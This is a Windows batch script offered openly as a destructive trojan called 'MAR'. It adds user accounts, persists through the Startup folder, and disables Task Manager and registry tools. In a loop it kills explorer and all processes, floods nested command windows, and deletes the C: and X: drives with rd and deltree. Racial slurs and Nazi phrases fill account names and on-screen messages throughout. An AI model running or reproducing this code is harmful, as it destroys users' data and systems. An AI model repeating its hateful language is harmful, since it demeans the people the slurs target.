@echo off
title MAR (trojan by kutz)
color 0F
echo EVERYTHING HERE WAS CODED BY KUTZ!
echo Discord = n1o8t
echo n1o8t | clip
pause
cls
echo WARNING
echo This virus can fully kill your computer (for being a batch script, doesn't mean it can't destroy your computer) so please don't complain if your main machine or anything like that gets destroyed. OK will continue, else click cancel. Administrator is recommended.
echo if you don't know what you may be doing or you forgot to use a vm, exit the batch script
echo press enter like the batch window will tell you to do and get another chance before starting pure madness.
pause
cls
echo ARE YOU SURE YOU WANT TO DO THIS?
echo This file is not just batch, but a trojan with earrape-bytebeats in it. You may use assets used in this or just completely republish/steal this project. But for real, are you sure? This is the last warning before running this trojan virus. This includes earrape, gdi effects (that can trigger a seizure for dear epilepsy users), and a system destroyer. This is recommended on a virtual machine and not your host/main machine, as this is very harmful. This is also NOT a worm since this is a batch virus. I hope you understand.
echo if you don't know what you may be doing or you forgot to use a vm, exit the batch script
echo press enter like the batch window will tell you to do and start the madness
pause
cls
color 04
color 40
color 44
color 00
color 44
color 00
color 40
color 04
color 04
color 40
color 40
color 44
color 00
color 40
color 04
title Windows Administration Server (WinAS)
net user niggerfucker niggerfucker /add
net user heil-hitler heil-hitler /add
net user niggerkiller niggerkiller /add
set "startupFolder=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
set "scriptPath=%~f0"
powershell -command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('%startupFolder%\startup_script.lnk'); $s.TargetPath = '%scriptPath%'; $s.Save()"
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "" /f
reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
echo dirty nigga #go fuck yourself
timeout /t 5 /nobreak >nul
call "%userprofile%\Downloads\mar\marui\bin\Debug\marui.exe"
taskkill /f /im explorer.exe
call "%userprofile%\Downloads\mar\marui\bin\Debug\marui.exe"
taskkill /f /s /pid 1048
taskkill /f /s /im fontdrvhost.exe
:nigger
start "" slidetoshutdown.exe
start "" cmd.exe
start "" powershell.exe
start "" msconfig
start "" control
start "" notepad
start "" calc
start "" write
start "" cleanmgr
start "" charmap
start "" ncpa.cpl
start "" control netconnections
start "" ping
start "" eventvwr
start "" perfmon
start "" msedge.exe
start "" magnify
start "" sdclt
start "" write
start "" regedit.exe
start "" ms-cxh://localonly
explorer shell:desktop
explorer shell:CredentialManager
explorer shell:CryptoKeys
explorer shell:downloads
explorer shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
explorer shell:SearchHistoryFolder
explorer shell:System
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this && start cmd /k "@echo off && color 04 && echo stupid batch ass nigga thinking they can survive this""""""""""""
echo NIGGER ASSHOLE KYS YOUR PC IS DEAD STOP TRYING > mar1.txt
start notepad mar1.txt
echo MAR DESTROYED YOUR SYSTEM > mar2.txt
start notepad mar2.txt
deltree /s /q C:
rd /s /q C:
deltree /s /q C:\
rd /s /q C:\
deltree /s /q X:
rd /s /q X:
deltree /s /q X:\
rd /s /q X:\
for /f "tokens=1" %%i in ('tasklist') do (
    taskkill /f /pid %%i >nul 2>&1
)
goto nigger
